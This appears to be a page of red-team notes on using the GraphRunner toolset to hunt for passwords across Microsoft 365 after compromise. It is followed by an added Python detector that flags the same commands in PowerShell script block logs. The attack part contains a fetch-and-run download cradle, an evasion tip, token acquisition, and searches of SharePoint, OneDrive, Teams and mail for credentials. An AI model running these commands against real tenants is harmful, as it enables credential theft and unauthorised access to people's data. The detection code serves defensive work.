GraphRunner
An excellent tool for finding loot in Microsoft 365 environments is the GraphRunner post-exploitation toolset. We can download and import the GraphRunner PowerShell script. It will be heavily signatured so we'll execute it from a whitelisted directory.
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
Get a graph session:
Get-GraphTokens
Download SharePoint and OneDrive files that contain "password":
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password'
Teams is commonly used by organizations, and we can use the Invoke-SearchTeams module, which searches all Teams messages in all channels that are readable by the current user, as well as notes/chats that the user sends to themselves:
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
Search email:
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
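From the defender's side, the commands above leave recognizable text in PowerShell script block logs. The following is an added example, not part of the original page or of GraphRunner: it flags the download cradle and the cmdlet names shown above in exported script block text. It assumes script block logging (event ID 4104) is enabled; the event records, host names and the `analyze`/`triage` helpers are constructed for illustration.

```python
import re

# Cmdlet names taken from the commands on this page.
GRAPHRUNNER_CMDLETS = ("Get-GraphTokens", "Invoke-SearchSharePointAndOneDrive",
                       "Invoke-SearchTeams", "Invoke-SearchMailbox")
# Download cradle: IEX / Invoke-Expression closely followed by iwr / Invoke-WebRequest.
CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression)\b.{0,40}?\b(?:iwr|invoke-webrequest)\b", re.I | re.S)
# Value passed to -SearchTerm: single-quoted, double-quoted or bare.
TERM_RE = re.compile(r"-SearchTerm\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)

# Constructed sample: script block text as exported from event ID 4104 records.
SAMPLE_EVENTS = [
    {"host": "WS-014", "text": "IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')"},
    {"host": "WS-014", "text": "Get-GraphTokens"},
    {"host": "WS-014", "text": "Invoke-SearchTeams -Tokens $tokens -SearchTerm password"},
    {"host": "WS-014", "text": 'Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40'},
    {"host": "WS-022", "text": r"Get-ChildItem C:\Reports | Select-Object Name"},
    {"host": "WS-022", "text": "iwr https://example.com/health -UseBasicParsing"},
]

def analyze(script_block):
    """Return the signals found in one script block, or None if it is clean."""
    cmdlets = [c for c in GRAPHRUNNER_CMDLETS
               if re.search(r"(?<![\w-])" + re.escape(c) + r"(?![\w-])", script_block, re.I)]
    cradle = bool(CRADLE_RE.search(script_block))
    terms = [next(g for g in m.groups() if g is not None) for m in TERM_RE.finditer(script_block)]
    if not cmdlets and not cradle:
        return None
    return {"cmdlets": cmdlets, "download_cradle": cradle, "search_terms": terms}

def triage(events):
    """Merge per-event signals into one record per host for analyst review."""
    hosts = {}
    for ev in events:
        f = analyze(ev["text"])
        if f is None:
            continue
        h = hosts.setdefault(ev["host"],
                             {"cmdlets": set(), "download_cradle": False, "search_terms": set()})
        h["cmdlets"].update(f["cmdlets"])
        h["download_cradle"] |= f["download_cradle"]
        h["search_terms"].update(f["search_terms"])
    return hosts

if __name__ == "__main__":
    for host, signals in triage(SAMPLE_EVENTS).items():
        print(host, signals)
```

A host that shows the cradle, token acquisition and one or more searches in the same session is a stronger lead than any single match; the extracted search terms tell responders which kinds of secrets to rotate first.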